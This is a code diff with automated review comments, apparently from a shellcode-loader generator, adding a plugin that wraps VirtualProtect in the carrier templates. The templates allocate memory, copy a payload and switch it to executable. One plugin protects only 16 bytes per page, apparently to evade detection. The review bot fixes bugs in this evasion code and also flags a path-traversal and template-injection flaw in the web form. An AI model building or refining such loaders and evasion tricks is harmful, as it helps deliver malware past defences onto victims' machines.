diff --git a/app/templates/project.html b/app/templates/project.html
index 755cca4..e499656 100644
--- a/app/templates/project.html
+++ b/app/templates/project.html
@@ -286,6 +286,23 @@
+
+
diff --git a/app/views_project.py b/app/views_project.py
index 2b1bcca..6d26acc 100644
--- a/app/views_project.py
+++ b/app/views_project.py
@@ -105,6 +105,7 @@ def project(name):
guardrail_styles = list_files(PATH_GUARDRAILS)
antiemulation_styles = list_files(PATH_ANTIEMULATION)
decoy_styles = list_files(PATH_DECOY)
+ virtualprotect_styles = list_files(PATH_VIRTUALPROTECT)
return render_template('project.html',
project_name = name,
@@ -136,6 +137,7 @@ def project(name):
guardrailstyles = guardrail_styles,
antiemulationstyles = antiemulation_styles,
decoystyles = decoy_styles,
+ virtualprotectstyles = virtualprotect_styles
)
@@ -216,6 +218,7 @@ def add_project():
settings.payload_location = PayloadLocation[payload_location]
settings.plugin_guardrail_data = request.form.get('guardrail_data', '')
+ settings.plugin_virtualprotect = request.form.get('virtualprotect')
# overwrite project
project = storage.get_project(project_name)
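Review bot: The `virtualprotect` form value stored at `settings.plugin_virtualprotect` is taken verbatim from the request and, per the phases/templater.py hunk in this diff, is later concatenated into a file path and the file is read and rendered as a Jinja2 template, so a value such as `../../other/file` selects a `.c` file outside the plugin directory and a missing field yields `None` and a lookup of `None.c`. Restrict it to a plain plugin name and fall back to the `"standard"` default that Settings declares: `name = request.form.get('virtualprotect', 'standard')`, `if not re.fullmatch(r'[A-Za-z0-9_-]+', name): abort(400)`, `settings.plugin_virtualprotect = name`. Whether `re`/`abort` are already imported in this module, and whether the sibling plugin fields are validated the same way, is outside the hunk; the body of add_project continues beyond it.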
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 29f343c..5f328eb 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -15,6 +15,7 @@ char *supermega_payload;
{{plugin_executionguardrail}}
+{{plugin_virtualprotect}}
/* VirtualAlloc -> rw -> rx
@@ -49,7 +50,7 @@ int main()
// to: dest[]
{{ plugin_decoder }}
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 7;
}
diff --git a/data/source/carrier/change_rw_rx/template.c b/data/source/carrier/change_rw_rx/template.c
index 99c2544..ce69c29 100644
--- a/data/source/carrier/change_rw_rx/template.c
+++ b/data/source/carrier/change_rw_rx/template.c
@@ -39,13 +39,13 @@ int main()
// Call: Decoy plugin
decoy();
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
return 16;
}
{{ plugin_decoder }}
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 16;
}
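Review bot: Both calls in this hunk now go through `MyVirtualProtect`, but no hunk in this diff inserts the `{{plugin_virtualprotect}}` placeholder into change_rw_rx/template.c (only alloc_rw_rx/template.c receives it at file scope), so unless that was done in a part of the file not shown, the rendered carrier has no definition of `MyVirtualProtect` and will not compile. Add the same line next to the other plugin placeholders before main(): `{{plugin_virtualprotect}}`. main() starts and ends outside the hunk.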
diff --git a/data/source/carrier/dll_loader_alloc/template.c b/data/source/carrier/dll_loader_alloc/template.c
index 98523a1..4a2b8e5 100644
--- a/data/source/carrier/dll_loader_alloc/template.c
+++ b/data/source/carrier/dll_loader_alloc/template.c
@@ -166,7 +166,7 @@ int main()
// Call: Decoy plugin
decoy();
- dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
+ dest = MyVirtualProtect(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
// FROM supermega_payload[]
// TO dest[]
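Review bot: `dest = MyVirtualProtect(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);` replaces the allocation call with the protection wrapper, which has a different contract: `MyVirtualProtect` as defined in data/source/virtualprotect/*.c in this diff takes `(LPVOID, SIZE_T, DWORD, PDWORD)` and returns a `BOOL`, so `dest` receives TRUE/FALSE instead of an address, `0x3000` is passed as the protection constant, `PAGE_EXECUTE_READWRITE` is passed where an old-protection pointer is expected, and the call targets address 0. The copy into `dest[]` that follows the hunk will then write through an invalid pointer. This carrier needs its allocation back, `dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);` — no `MyVirtualAlloc` plugin exists in this diff. As with the other carriers, this template also shows no `{{plugin_virtualprotect}}` placeholder in the diff; main() starts and ends outside the hunk.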
diff --git a/data/source/carrier/dll_loader_change/template.c b/data/source/carrier/dll_loader_change/template.c
index 59a9c6b..e6d71a1 100644
--- a/data/source/carrier/dll_loader_change/template.c
+++ b/data/source/carrier/dll_loader_change/template.c
@@ -201,7 +201,7 @@ int main()
// Call: Decoy plugin
decoy();
- VirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
+ MyVirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
// FROM supermega_payload[]
// TO dest[]
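Review bot: The return value of `MyVirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);` is discarded, whereas the other carriers in this diff bail out on failure with `if (MyVirtualProtect(...) == 0) { return 16; }`. With the new `undersized` plugin the wrapper can return FALSE after only some pages were changed, so on failure the copy into `dest[]` that follows the hunk runs against memory whose protection is unknown. Check it the same way: `if (MyVirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect) == 0) { return 16; }` (use whatever exit code this carrier's other error paths use; they are outside the hunk). Nothing in the diff inserts `{{plugin_virtualprotect}}` into this template either, so `MyVirtualProtect` may be undeclared here unless that was done outside the shown hunks; main() starts and ends outside the hunk.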
diff --git a/data/source/carrier/peb_walk/template.c b/data/source/carrier/peb_walk/template.c
index 08e275a..6ccfa4c 100644
--- a/data/source/carrier/peb_walk/template.c
+++ b/data/source/carrier/peb_walk/template.c
@@ -5,7 +5,7 @@
char *supermega_payload;
/* peb_walk
- Standard shellcode which will resolve IAT by itself with a peb walk
+ Test shellcode which will resolve IAT by itself with a peb walk
no IAT reuse is performed
no data reuse is performed
*/
diff --git a/data/source/virtualprotect/standard.c b/data/source/virtualprotect/standard.c
new file mode 100644
index 0000000..09602ce
--- /dev/null
+++ b/data/source/virtualprotect/standard.c
@@ -0,0 +1,9 @@
+
+BOOL MyVirtualProtect(
+ LPVOID lpAddress,
+ SIZE_T dwSize,
+ DWORD flNewProtect,
+ PDWORD lpflOldprotect
+) {
+ return VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldprotect);
+}
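Review bot: The new plugin file has no comment saying what it is or when it is selected, even though it is the value Settings defaults to; add a header so a reader of the generated carrier knows this is the pass-through: `// VirtualProtect plugin "standard" (default): thin wrapper that calls VirtualProtect() with its arguments unchanged.` Note the file is rendered through Jinja2 before being pasted into the carrier (phases/templater.py in this diff), so any `{{` or `{%` in a comment would be interpreted rather than emitted. Minor: the last parameter is spelled `lpflOldprotect` while the Win32 prototype uses `lpflOldProtect`; harmless, but both plugin files define the same signature and should agree.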
diff --git a/data/source/virtualprotect/undersized.c b/data/source/virtualprotect/undersized.c
new file mode 100644
index 0000000..b50f8bf
--- /dev/null
+++ b/data/source/virtualprotect/undersized.c
@@ -0,0 +1,19 @@
+
+// How many bytes we VirtualProtect
+#define VP_SIZE 16
+
+BOOL MyVirtualProtect(
+ LPVOID lpAddress,
+ SIZE_T dwSize,
+ DWORD flNewProtect,
+ PDWORD lpflOldprotect
+) {
+ char *dest = (char *)lpAddress;
+
+ for(int n=0; n<(dwSize/4096)+1; n++) {
+ if (VirtualProtect(dest + (n * 4096), VP_SIZE, flNewProtect, lpflOldprotect) == 0) {
+ return FALSE;
+ }
+ }
+ return TRUE;
+}
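Review bot: The loop in `MyVirtualProtect` derives its iteration count from `dwSize` alone (`n<(dwSize/4096)+1`) and steps from `lpAddress`, so the set of pages it touches does not match the range [lpAddress, lpAddress+dwSize): when `lpAddress` is not page-aligned the range can span one more page than the loop visits (start at page offset 4095 with size 4098 crosses three pages but only two are protected), leaving the tail of the payload with its old protection, and when the range is aligned and an exact multiple of 4096 the extra iteration re-protects the page after the buffer. Iterate over page-aligned addresses derived from both the start and the end instead, as below (note this makes `dwSize == 0` protect nothing, where the original touched one page). Two caveats worth a comment in the file: `lpflOldprotect` ends up holding only the last page's previous protection, and 4096 is assumed rather than queried via GetSystemInfo, which may be intentional for this plugin. The 16-byte `VP_SIZE` itself is fine, since VirtualProtect rounds the region to whole pages.
```c
BOOL MyVirtualProtect(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flNewProtect,
    PDWORD lpflOldprotect
) {
    // Walk every page overlapping [lpAddress, lpAddress + dwSize),
    // computed from page-aligned start and end rather than from dwSize alone.
    SIZE_T page  = 4096;
    SIZE_T start = (SIZE_T)lpAddress & ~(page - 1);
    SIZE_T end   = ((SIZE_T)lpAddress + dwSize + page - 1) & ~(page - 1);

    for (SIZE_T p = start; p < end; p += page) {
        // Only VP_SIZE bytes are requested per call; VirtualProtect rounds to the page.
        // lpflOldprotect keeps only the last page's previous protection.
        if (VirtualProtect((LPVOID)p, VP_SIZE, flNewProtect, lpflOldprotect) == 0) {
            return FALSE;
        }
    }
    return TRUE;
}
```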
diff --git a/model/defs.py b/model/defs.py
index daba564..ca04df4 100644
--- a/model/defs.py
+++ b/model/defs.py
@@ -18,6 +18,7 @@ PATH_DECODER = "data/source/decoder/"
PATH_ANTIEMULATION = "data/source/antiemulation/"
PATH_DECOY = "data/source/decoy/"
PATH_GUARDRAILS = "data/source/guardrails/"
+PATH_VIRTUALPROTECT = "data/source/virtualprotect/"
PATH_WEB_PROJECT = "projects/"
diff --git a/model/settings.py b/model/settings.py
index e715f20..e54e0f2 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -18,6 +18,8 @@ class Settings():
self.plugin_decoy = "none"
self.plugin_guardrail = "none"
self.plugin_guardrail_data = "C:\\Users\\"
+ self.plugin_virtualprotect = "standard"
+ self.plugin_virtualprotect_data = ""
self.dllfunc: str = "" # For DLL injection
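Review bot: `plugin_virtualprotect_data` is introduced with an empty default and is passed to the plugin template as `virtualprotect_data` (phases/templater.py in this diff), but nothing in the diff assigns it from the form — add_project only sets `plugin_virtualprotect` — and neither shipped plugin file references it. Either wire it up or mark it: `self.plugin_virtualprotect_data = ""  # reserved; not yet settable from the web form`. A short comment on the name attribute would also help, e.g. `self.plugin_virtualprotect = "standard"  # file stem under PATH_VIRTUALPROTECT; "standard" is a pass-through`. The Settings.__init__ body continues outside the hunk.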
diff --git a/phases/templater.py b/phases/templater.py
index 0231138..f8173e9 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -27,6 +27,15 @@ def create_c_from_template(settings: Settings, payload_len: int):
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
+ # Plugin: VirtualAlloc
+ filepath_virtualprotect = PATH_VIRTUALPROTECT + "{}.c".format(
+ settings.plugin_virtualprotect)
+ with open(filepath_virtualprotect, "r", encoding='utf-8') as file:
+ plugin_virtualprotect = file.read()
+ plugin_virtualprotect = Template(plugin_virtualprotect).render({
+ 'virtualprotect_data': settings.plugin_virtualprotect_data,
+ })
+
# Plugin: Execution Guardrails
filepath_guardrails = PATH_GUARDRAILS + "{}.c".format(
settings.plugin_guardrail)
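Review bot: The new block builds `filepath_virtualprotect` by string-concatenating `settings.plugin_virtualprotect` into the path and then reads and Jinja2-renders whatever file that names; `add_project` in this diff stores that value straight from `request.form`, so a traversal value selects any readable `*.c` file (and, because it is rendered as a template, its `{{ }}` expressions are evaluated), while a missing value ends up as `None.c` and raises FileNotFoundError. Even if the view is tightened, this function should resolve the path and refuse anything outside PATH_VIRTUALPROTECT, as sketched below (it assumes `os` is available in the module; the imports are outside the hunk). The comment on the first added line also reads `# Plugin: VirtualAlloc`; it should say `# Plugin: VirtualProtect`. create_c_from_template starts and ends outside the hunk.
```python
    # Plugin: VirtualProtect
    plugin_dir = os.path.realpath(PATH_VIRTUALPROTECT)
    filepath_virtualprotect = os.path.realpath(
        os.path.join(plugin_dir, "{}.c".format(settings.plugin_virtualprotect)))
    # Refuse names that resolve outside the plugin directory (form-supplied value)
    if os.path.dirname(filepath_virtualprotect) != plugin_dir:
        raise ValueError("invalid virtualprotect plugin: {!r}".format(
            settings.plugin_virtualprotect))
    with open(filepath_virtualprotect, "r", encoding='utf-8') as file:
        plugin_virtualprotect = file.read()
    # … unchanged: Template(plugin_virtualprotect).render(...) …
```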
@@ -75,6 +84,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoy': plugin_decoy,
'plugin_executionguardrail': plugin_guardrails,
'PAYLOAD_LEN': payload_len,
+ 'plugin_virtualprotect': plugin_virtualprotect,
})
with open(settings.main_c_path, "w", encoding='utf-8') as file:
file.write(rendered_template)